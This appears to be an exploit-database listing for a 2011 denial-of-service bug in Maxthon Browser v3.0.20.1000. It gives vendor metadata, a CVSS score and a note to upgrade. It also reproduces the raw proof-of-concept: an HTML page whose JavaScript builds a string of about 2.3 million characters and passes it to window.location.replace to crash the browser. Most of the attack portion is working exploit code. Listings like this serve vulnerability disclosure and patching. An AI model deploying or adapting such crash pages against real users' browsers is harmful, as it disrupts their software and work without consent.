header-logo
Suggest Exploit
vendor:
Maxthon Browser
by:
Carlos Mario Penagos Hollmann
7.8
CVSS
HIGH
Denial of Service (DoS)
20
CWE
Product Name: Maxthon Browser
Affected Version From: v3.0.20.1000
Affected Version To: v3.0.20.1000
Patch Exists: YES
Related CWE: N/A
CPE: a:maxthon:maxthon_browser:3.0.20.1000
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3, Windows 7, Linux (VMware Fusion 3.1 and VirtualBox 3.2.8)
2011

Maxthon Browser v3.0.20.1000 .ref .replace DOS

This exploit is a Denial of Service (DoS) vulnerability in Maxthon Browser v3.0.20.1000. The vulnerability is caused due to a boundary error when handling the .ref and .replace functions, which can be exploited to cause a DoS condition. The exploit code uses the mul() function to generate a string of 2304453 'a' characters, which is then passed to the .ref and .replace functions. This causes the browser to crash.

Mitigation:

Upgrade to the latest version of Maxthon Browser.
Source

Exploit-DB raw data:

<html>
<head>
 
 
# Exploit Title: Maxthon Browser v3.0.20.1000 .ref .replace DOS
# Date: January 30 2011
# Author: Carlos Mario Penagos Hollmann
# Software Link: http://dl.maxthon.com/mx3/mx3.0.20.3000.exe
# Version: v3.0.20.1000 
# Tested on: Windows xp sp3 ,windows 7 ,linux running on VMware Fusion 3.1 and VirtualBox 3.2.8
  
  
#  mail----> shogilord^gmail.com spams are welcome!!!!!
#    ________  _    _________   ____ __ _____   ________
#   / ____/ / | |  / / ____/ | / / //_//  _/ | / / ____/
#  / __/ / /  | | / / __/ /  |/ / ,<   / //  |/ / / __
# / /___/ /___| |/ / /___/ /|  / /| |_/ // /|  / /_/ /
#/_____/_____/|___/_____/_/ |_/_/ |_/___/_/ |_/\____/ 
  
# COLOMBIA hacking presents.............
#    
# MAxthon Check the .replace and .ref ;)
#

 
<script type="text/javascript">
 
function mul(str,count){
    if(count==0) return '';
    var binaryCount = count.toString(2);
    var numDegree = binaryCount.length;
    var resultStr='';
    for(var i=0; i<numDegree; i++){
        resultStr+=resultStr; 
        if(binaryCount.charAt(i) == '1'){
            resultStr+=str;
        }
    }
    return resultStr;
}
 
var junka = "a";
 
var junk = mul(junka,2304453);
 
//window.location.href = "http://" + junk;
 
window.location.replace("http://" + junk);
 
</script>
</head>
<body>
 
</body>
</html>

Navigation

Suggest Exploit

Services By CQR